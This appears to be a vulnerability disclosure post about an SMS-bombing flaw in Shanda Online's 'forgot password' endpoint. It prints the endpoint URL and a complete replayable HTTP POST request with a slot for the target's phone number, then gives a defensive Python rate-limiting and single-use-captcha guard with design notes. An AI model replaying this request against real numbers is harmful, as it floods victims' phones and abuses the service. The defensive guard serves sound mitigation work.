Shanda Networks SMS DDoS Attack Vulnerability and Fix


Brief description:

Shanda Online (盛大在线) has an SMS DDoS vulnerability.

Detailed description:

The "forgot password" flow on Shanda Online sends a verification code to a mobile phone. URL:

http://pwd.sdo.com/ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx?showbindmobile=1

The phone number is fully attacker-controlled and no limit is placed on the number of codes sent, so the endpoint can be used for an SMS DDoS attack (SMS flooding of an arbitrary phone).

 

Proof of vulnerability:

POST /ptinfo/safecenter/Controls/IPwd.aspx HTTP/1.1
Host: pwd.sdo.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
Accept: */*
Accept-Language: zh-cn,zh;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://pwd.sdo.com/ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx?showbindmobile=1
Content-Length: 444
Cookie: ASP.NET_SessionId=rfuowv55tuqwmgifvidao255; b_t_s=t115065872973xs; sdo_beacon_id=58.215.45.150.1315065873297.3; CaptchaSeq=kgWVVswyQC6C55eS
Pragma: no-cache
Cache-Control: no-cache

at=GetPwdMobileSendCode&source=S&pt=&ekey=&ekey1=&ekey2=&ekey3=&ekey4=&ecard1=&ecard2=&ecard3=&phone=[replace with target phone number]&code=&imgcode=&email=&mobile=&mobilecode=&emailcode=&regname=&regidcard=&regemail=&regmobile=&regtel=&regbirthday=&regquestion1=&reganswer1=&regquestion2=&reganswer2=&adultname=&adultidcard=&orgpwd=&signarea=&firstgame=&signtime=&stolentime=&hispwd=&oldpwd=&newpwd=&newpwd2=&days=&selectunbind=&uploadpic=&custompwd=&a=&randomcode=

Replaying the above request repeatedly performs the DDoS attack.
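The defect the report describes is that the send-code endpoint accepts any phone number, accepts the same captcha token again and again, and never counts how many codes it has sent. The guard below is an added example written for this page; it is not Shanda's code and does not reflect how their endpoint is implemented. It shows the server-side checks a send-code handler should run before dispatching an SMS: a single-use captcha token (so a captured request cannot be replayed verbatim), and sliding-window caps on sends per target phone and per requesting session. The thresholds, key names, in-memory store and sample phone number are assumptions constructed for illustration.

```python
"""Server-side guard for an SMS verification-code endpoint (added example).

Not Shanda's code. Demonstrates the checks that prevent a captured
"send code" request from being replayed to flood a victim's phone.
"""
import time
from collections import defaultdict, deque

# Assumed policy (illustrative values, not from the report):
#   at most 3 codes per phone per 10 minutes, 10 per phone per day,
#   and 20 sends per requesting session per hour.
PHONE_SHORT_LIMIT = (3, 600)
PHONE_DAY_LIMIT = (10, 86400)
SESSION_LIMIT = (20, 3600)


class SmsSendGuard:
    """Decide whether one more verification SMS may be sent."""

    def __init__(self, clock=time.time):
        self.clock = clock                   # injectable for deterministic tests
        self.events = defaultdict(deque)     # key -> timestamps of allowed sends
        self.used_captchas = set()           # captcha tokens already consumed

    def _count(self, key, window, now):
        """Drop timestamps older than `window` seconds, return what remains."""
        q = self.events[key]
        while q and q[0] <= now - window:
            q.popleft()
        return len(q)

    def check(self, phone, session_id, captcha_seq, captcha_ok):
        """Return (allowed, reason). Call once per live send-code request."""
        now = self.clock()
        if not captcha_ok:
            return False, "captcha_failed"
        # A captcha token is valid for exactly one send; replaying the same
        # captured request therefore fails here before any SMS is queued.
        if captcha_seq in self.used_captchas:
            return False, "captcha_replayed"
        limits = (
            (("phone", phone), PHONE_SHORT_LIMIT),
            (("phone-day", phone), PHONE_DAY_LIMIT),
            (("session", session_id), SESSION_LIMIT),
        )
        for key, (limit, window) in limits:
            if self._count(key, window, now) >= limit:
                return False, "rate_limited:" + key[0]
        # All checks passed: record the send and burn the captcha token.
        self.used_captchas.add(captcha_seq)
        for key, _ in limits:
            self.events[key].append(now)
        return True, "sent"


def simulate_replay(n=5):
    """Replay one captured request n times, 1 s apart (constructed scenario)."""
    t = [1000.0]
    guard = SmsSendGuard(clock=lambda: t[0])
    results = []
    for _ in range(n):
        # Same phone, same session, same captcha token every time.
        results.append(guard.check("13800000000", "sess-A", "captcha-0", True)[1])
        t[0] += 1
    return results


def simulate_fresh_captchas(n=5):
    """Attacker solves a new captcha each time: the per-phone cap still holds."""
    t = [1000.0]
    guard = SmsSendGuard(clock=lambda: t[0])
    results = []
    for i in range(n):
        results.append(guard.check("13800000000", "sess-A", f"captcha-{i}", True)[1])
        t[0] += 1
    return results


if __name__ == "__main__":
    print("replayed request:", simulate_replay())
    print("fresh captchas:  ", simulate_fresh_captchas())
```

Two design points matter here. The per-phone cap is keyed on the victim's number, not the requester, so rotating sessions or source addresses does not help an attacker flood one phone; and the captcha token is consumed on success, so the exact request shown in the proof above would be rejected on its second submission. In a real deployment the event store would live in a shared cache rather than process memory, and the rejections would be logged for detection.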

Author: mog

 
